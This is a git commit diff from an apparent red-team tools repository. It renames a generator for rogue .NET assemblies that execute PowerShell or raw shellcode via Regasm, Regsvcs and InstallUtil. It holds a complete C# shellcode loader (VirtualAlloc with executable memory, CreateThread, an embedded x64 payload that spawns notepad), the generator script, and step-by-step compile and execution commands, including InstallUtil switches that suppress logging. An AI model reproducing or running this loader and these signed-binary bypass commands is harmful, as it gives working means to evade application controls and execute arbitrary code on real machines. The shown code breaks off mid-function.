Updated rogue-dot-net
This commit is contained in:
parent
1138751330
commit
72c1136fda
@ -316,7 +316,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
|
|||||||
|
|
||||||
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
|
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
|
||||||
|
|
||||||
- [**`regsvcs`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/regsvcs) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs** code execution primitives.
|
- [**`rogue-dot-net`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/rogue-dot-net) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs**/**InstallUtil** code execution primitives.
|
||||||
|
|
||||||
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
|
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
|
||||||
|
|
||||||
|
@ -1,78 +0,0 @@
|
|||||||
## Rogue .NET Assembly for Regsvcs/Regasm Code Execution
|
|
||||||
|
|
||||||
Follow below described steps to properly generate your source code and then compile it to a .NET Assembly valid for Regasm/Regsvcs:
|
|
||||||
|
|
||||||
### Step 1: Generate key.snk file
|
|
||||||
|
|
||||||
```
|
|
||||||
powershell -file build.ps1
|
|
||||||
```
|
|
||||||
|
|
||||||
### Step 2: Generate source code file
|
|
||||||
|
|
||||||
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
|
|
||||||
|
|
||||||
Usage:
|
|
||||||
|
|
||||||
```
|
|
||||||
python3 generateRegsvcs.py --help
|
|
||||||
|
|
||||||
:: Regsvcs Code Execution Source code generation utility
|
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
|
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
|
||||||
|
|
||||||
usage: .\generateRegsvcs.py [options] <inputFile>
|
|
||||||
|
|
||||||
positional arguments:
|
|
||||||
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
|
|
||||||
|
|
||||||
optional arguments:
|
|
||||||
-h, --help show this help message and exit
|
|
||||||
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
|
|
||||||
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
|
|
||||||
```
|
|
||||||
|
|
||||||
Sample use case:
|
|
||||||
|
|
||||||
```
|
|
||||||
python3 generateRegsvcs.py -r notepad64.bin > program.cs
|
|
||||||
|
|
||||||
:: Regsvcs Code Execution Source code generation utility
|
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
|
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
|
||||||
|
|
||||||
[?] File specified as raw Shellcode.
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
### Step 3: Compilate library .NET Assembly
|
|
||||||
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
|
||||||
```
|
|
||||||
|
|
||||||
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
|
|
||||||
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
### Step 4: Code execution via Regsvcs or Regasm:
|
|
||||||
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
|
|
||||||
```
|
|
||||||
or
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
|
|
||||||
```
|
|
||||||
or
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
|
|
||||||
```
|
|
||||||
or
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
|
|
||||||
```
|
|
Binary file not shown.
90
red-teaming/rogue-dot-net/README.md
Normal file
@ -0,0 +1,90 @@
|
|||||||
|
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
|
||||||
|
|
||||||
|
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
|
||||||
|
|
||||||
|
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
|
||||||
|
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
|
||||||
|
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
|
||||||
|
|
||||||
|
### Step 1: Generate key.snk file
|
||||||
|
|
||||||
|
```
|
||||||
|
powershell -file build.ps1
|
||||||
|
```
|
||||||
|
|
||||||
|
### Step 2: Generate source code file
|
||||||
|
|
||||||
|
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
|
||||||
|
```
|
||||||
|
python3 generateRogueDotNet.py --help
|
||||||
|
|
||||||
|
:: Rogue .NET Source Code Generation Utility
|
||||||
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
|
usage: .\generateRogueDotNet.py [options] <inputFile>
|
||||||
|
|
||||||
|
positional arguments:
|
||||||
|
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
|
||||||
|
|
||||||
|
optional arguments:
|
||||||
|
-h, --help show this help message and exit
|
||||||
|
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
|
||||||
|
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
|
||||||
|
```
|
||||||
|
|
||||||
|
Sample use case:
|
||||||
|
|
||||||
|
```
|
||||||
|
python3 generateRogueDotNet.py -r notepad64.bin > program.cs
|
||||||
|
|
||||||
|
:: Rogue .NET Source Code Generation Utility
|
||||||
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
|
[?] File specified as raw Shellcode.
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Step 3: Compilate library .NET Assembly
|
||||||
|
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
```
|
||||||
|
|
||||||
|
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
|
||||||
|
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
|
||||||
|
|
||||||
|
- x86:
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
```
|
||||||
|
|
||||||
|
- x64:
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
```
|
@ -1,28 +1,38 @@
|
|||||||
#!/usr/bin/python3
|
#!/usr/bin/python3
|
||||||
#
|
#
|
||||||
# Red-Teaming script that constructs C# code for Regsvcs code execution technique.
|
# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique.
|
||||||
#
|
#
|
||||||
# Step 1: Generate source code file
|
# Step 1: Generate source code file
|
||||||
# cmd> python3 generateRegsvcs.py -r payload.bin > program.cs
|
# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs
|
||||||
#
|
#
|
||||||
# Step 2: Compilate library .NET Assembly
|
# Step 2: Compilate library .NET Assembly
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
#
|
#
|
||||||
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
|
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
|
||||||
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
|
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
|
||||||
# Then proper compilation command will be:
|
# Then proper compilation command will be:
|
||||||
#
|
#
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
#
|
#
|
||||||
#
|
# Step 3: Code execution via Regsvcs, Regasm or InstallUtil:
|
||||||
# Step 3: Code execution via Regsvcs or Regasm:
|
# x86:
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
# or
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
|
|
||||||
# or
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
# or
|
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
# x64:
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
||||||
|
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
@ -203,13 +213,13 @@ $usings
|
|||||||
Set-Content key.snk -Value $Content -Encoding Byte
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
Step 2: Compile source code:
|
Step 2: Compile source code:
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
Step 3: Execute your payload!
|
Step 3: Execute your payload!
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
||||||
*/
|
*/
|
||||||
|
|
||||||
namespace Program
|
namespace Program
|
||||||
@ -235,6 +245,16 @@ namespace Program
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
[System.ComponentModel.RunInstaller(true)]
|
||||||
|
public class ForInstallUtil : System.Configuration.Install.Installer
|
||||||
|
{
|
||||||
|
// This executes during InstallUtil /U invocation
|
||||||
|
public override void Uninstall(System.Collections.IDictionary savedState)
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
public class Shellcode
|
public class Shellcode
|
||||||
{
|
{
|
||||||
$launchCode
|
$launchCode
|
||||||
@ -284,13 +304,13 @@ def opts(argv):
|
|||||||
|
|
||||||
def main(argv):
|
def main(argv):
|
||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: Regsvcs Code Execution Source code generation utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
print('Usage: ./generateRegsvcs.py <inputFile>')
|
print('Usage: ./generateRogueDotNet.py <inputFile>')
|
||||||
sys.exit(-1)
|
sys.exit(-1)
|
||||||
|
|
||||||
args = opts(argv)
|
args = opts(argv)
|
||||||
@ -299,24 +319,22 @@ def main(argv):
|
|||||||
|
|
||||||
if args.exe:
|
if args.exe:
|
||||||
if not detectFileIsExe(args.inputFile, args.exe):
|
if not detectFileIsExe(args.inputFile, args.exe):
|
||||||
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
|
sys.stderr.write('[-] File not recognized as PE/EXE.\n\n')
|
||||||
return False
|
return False
|
||||||
|
|
||||||
_format = 'exe'
|
_format = 'exe'
|
||||||
sys.stderr.write('[?] File recognized as PE/EXE.\n\n')
|
sys.stderr.write('[+] File recognized as PE/EXE.\n\n')
|
||||||
with open(args.inputFile, 'rb') as f:
|
with open(args.inputFile, 'rb') as f:
|
||||||
payload = f.read()
|
payload = f.read()
|
||||||
|
|
||||||
elif args.raw:
|
elif args.raw:
|
||||||
_format = 'raw'
|
_format = 'raw'
|
||||||
sys.stderr.write('[?] File specified as raw Shellcode.\n\n')
|
sys.stderr.write('[+] File specified as raw Shellcode.\n\n')
|
||||||
with open(args.inputFile, 'rb') as f:
|
with open(args.inputFile, 'rb') as f:
|
||||||
payload = f.read()
|
payload = f.read()
|
||||||
|
|
||||||
else:
|
else:
|
||||||
sys.stderr.write('[?] Powershell code given.\n')
|
sys.stderr.write('[+] Powershell code given.\n')
|
||||||
sys.stderr.write('[?] WARNING: You need to have System.Management.Automation assemblies preinstalled.\n')
|
|
||||||
sys.stderr.write(' Obtain them from: .\n\n')
|
|
||||||
|
|
||||||
if args.inputFile.endswith('.exe'):
|
if args.inputFile.endswith('.exe'):
|
||||||
return False
|
return False
|
||||||
@ -342,13 +360,17 @@ Step 1: Create Your Strong Name Key -> key.snk
|
|||||||
Set-Content key.snk -Value $Content -Encoding Byte
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
Step 2: Compile source code:
|
Step 2: Compile source code:
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
Step 3: Execute your payload!
|
Step 3: Execute your payload!
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll
|
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
||||||
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
|
%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
%WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
'''.format(management)
|
'''.format(management)
|
||||||
|
|
||||||
if 'PROGRAMFILES(X86)' in os.environ:
|
if 'PROGRAMFILES(X86)' in os.environ:
|
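Review bot: The InstallUtil lines added in the header comment, `# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll`, and repeated in the usage string of the last hunk, cannot work with the Step 2 build, which compiles `rogue.dll` with the v4.0.30319 `csc.exe`: a CLR 2.0 host such as the v2 InstallUtil refuses assemblies built for runtime 4.0, so those invocations will fail unless a separate v2-compiled build is documented. I would either drop the v2.0.50727 lines or add the matching v2 `csc.exe` command next to them. In the usage-string hunk the x86 block mixes `Framework\\` regasm/regsvcs paths with `Framework64\\` InstallUtil paths (`%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe ...`), which looks like a copy-paste slip compared with the README; that string lives inside `main()`, which starts outside the hunk. The `/logfile= /logtoconsole=false` switches presumably exist to keep InstallUtil from writing its default `.InstallLog` next to the DLL; a one-line comment stating that, e.g. `# /logfile= (empty value) suppresses the .InstallLog InstallUtil would otherwise create on disk`, would tell operators why the switches matter.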
BIN
red-teaming/rogue-dot-net/notepad64.bin
Normal file
Binary file not shown.
141
red-teaming/rogue-dot-net/program.cs
Normal file
@ -0,0 +1,141 @@
|
|||||||
|
|
||||||
|
using System;
|
||||||
|
using System.Diagnostics;
|
||||||
|
using System.Reflection;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.EnterpriseServices;
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
Author: Casey Smith, Twitter: @subTee
|
||||||
|
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
License: BSD 3-Clause
|
||||||
|
|
||||||
|
Step 1: Create Your Strong Name Key -> key.snk
|
||||||
|
|
||||||
|
$key = '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'
|
||||||
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
|
Step 2: Compile source code:
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
|
Step 3: Execute your payload!
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
|
||||||
|
*/
|
||||||
|
|
||||||
|
namespace Program
|
||||||
|
{
|
||||||
|
public class Bypass : ServicedComponent
|
||||||
|
{
|
||||||
|
public Bypass()
|
||||||
|
{
|
||||||
|
}
|
||||||
|
|
||||||
|
// This executes if registration is successful
|
||||||
|
[ComRegisterFunction]
|
||||||
|
public static void RegisterClass( string key )
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
|
||||||
|
// This executes if registration fails
|
||||||
|
[ComUnregisterFunction]
|
||||||
|
public static void UnRegisterClass( string key )
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
[System.ComponentModel.RunInstaller(true)]
|
||||||
|
public class ForInstallUtil : System.Configuration.Install.Installer
|
||||||
|
{
|
||||||
|
// This executes during InstallUtil /U invocation
|
||||||
|
public override void Uninstall(System.Collections.IDictionary savedState)
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
public class Shellcode
|
||||||
|
{
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern IntPtr VirtualAlloc(
|
||||||
|
IntPtr lpAddress, UIntPtr dwSize,
|
||||||
|
UInt32 flAllocationType,
|
||||||
|
UInt32 flProtect
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern bool VirtualFree(
|
||||||
|
IntPtr lpAddress,
|
||||||
|
UInt32 dwSize,
|
||||||
|
UInt32 dwFreeType
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern IntPtr CreateThread(
|
||||||
|
UInt32 lpThreadAttributes,
|
||||||
|
UInt32 dwStackSize,
|
||||||
|
IntPtr lpStartAddress,
|
||||||
|
IntPtr param,
|
||||||
|
UInt32 dwCreationFlags,
|
||||||
|
ref UInt32 lpThreadId
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern bool CloseHandle(
|
||||||
|
IntPtr hHandle
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern UInt32 WaitForSingleObject(
|
||||||
|
IntPtr hHandle,
|
||||||
|
UInt32 dwMilliseconds
|
||||||
|
);
|
||||||
|
|
||||||
|
private static UInt32 MEM_COMMIT = 0x1000;
|
||||||
|
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
||||||
|
private static UInt32 MEM_RELEASE = 0x8000;
|
||||||
|
|
||||||
|
public static void Execute() {
|
||||||
|
|
||||||
|
byte[] payload = new byte[279] {
|
||||||
|
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
|
||||||
|
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
|
||||||
|
0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
|
||||||
|
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed,
|
||||||
|
0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
|
||||||
|
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
|
||||||
|
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
|
||||||
|
0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1,
|
||||||
|
0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
|
||||||
|
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
|
||||||
|
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a,
|
||||||
|
0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
|
||||||
|
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b,
|
||||||
|
0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
|
||||||
|
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47,
|
||||||
|
0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70,
|
||||||
|
0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00
|
||||||
|
};
|
||||||
|
|
||||||
|
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||||
|
Marshal.Copy(payload, 0, funcAddr, payload.Length);
|
||||||
|
IntPtr hThread = IntPtr.Zero;
|
||||||
|
UInt32 threadId = 0;
